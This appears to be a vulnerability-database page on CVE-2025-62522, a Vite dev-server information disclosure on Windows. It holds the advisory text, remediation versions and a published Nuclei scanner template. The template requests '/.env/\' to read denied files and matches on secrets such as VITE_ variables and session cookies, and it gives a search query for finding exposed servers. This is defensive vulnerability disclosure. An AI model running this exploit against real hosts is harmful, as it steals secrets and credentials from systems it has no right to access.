CVE-2025-62522: Vite - Information Disclosure

日期: 2026-01-08 | 影响软件: Vite | POC: 已公开

漏洞描述

Vite is a frontend tooling framework for JavaScript.In versions from 2.9.18 to before 3.0.0, 3.2.9 to before 4.0.0, 4.5.3 to before 5.0.0, 5.2.6 to before 5.4.21, 6.0.0 to before 6.4.1, 7.0.0 to before 7.0.8, and 7.1.0 to before 7.1.11, files denied by server.fs.deny were sent if the URL ended with \ when the dev server is running on Windows. Only apps explicitly exposing the Vite dev server to the network and running the dev server on Windows were affected. This issue has been patched in versions 5.4.21, 6.4.1, 7.0.8, and 7.1.11.

PoC代码[已公开]

id: CVE-2025-62522

info:
  name: Vite - Information Disclosure
  author: DhiyaneshDK
  severity: medium
  description: |
    Vite is a frontend tooling framework for JavaScript.In versions from 2.9.18 to before 3.0.0, 3.2.9 to before 4.0.0, 4.5.3 to before 5.0.0, 5.2.6 to before 5.4.21, 6.0.0 to before 6.4.1, 7.0.0 to before 7.0.8, and 7.1.0 to before 7.1.11, files denied by server.fs.deny were sent if the URL ended with \ when the dev server is running on Windows. Only apps explicitly exposing the Vite dev server to the network and running the dev server on Windows were affected. This issue has been patched in versions 5.4.21, 6.4.1, 7.0.8, and 7.1.11.
  impact: |
    Remote attackers can access files denied by server.fs.deny, leading to sensitive information disclosure.
  remediation: |
    Update to versions 5.4.21, 6.4.1, 7.0.8, or 7.1.11 or later.
  reference:
    - https://github.com/vitejs/vite/security/advisories/GHSA-93m4-6634-74q7
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="/@vite/client"
  tags: cve,cve2025,env,vite,disclosure

http:
  - raw:
      - |
        GET /.env/\ HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_any(body, "SESSDATA=","WEIBO_COOKIE=") || contains(body, "VITE_")'
          - '!contains(tolower(body), "<html")'
        condition: and
# digest: 4a0a0047304502200b2f77acd6399f05380dfd3a1012d44ed5b85884213e6a6f4784d12f0ebec35a022100e87bd0b5cf356faab9bfb8efde68894c4d5ad2d6c60c171ea16ef78eb2650fa8:922c64590222798bb761d5b6d8e72950

相关漏洞推荐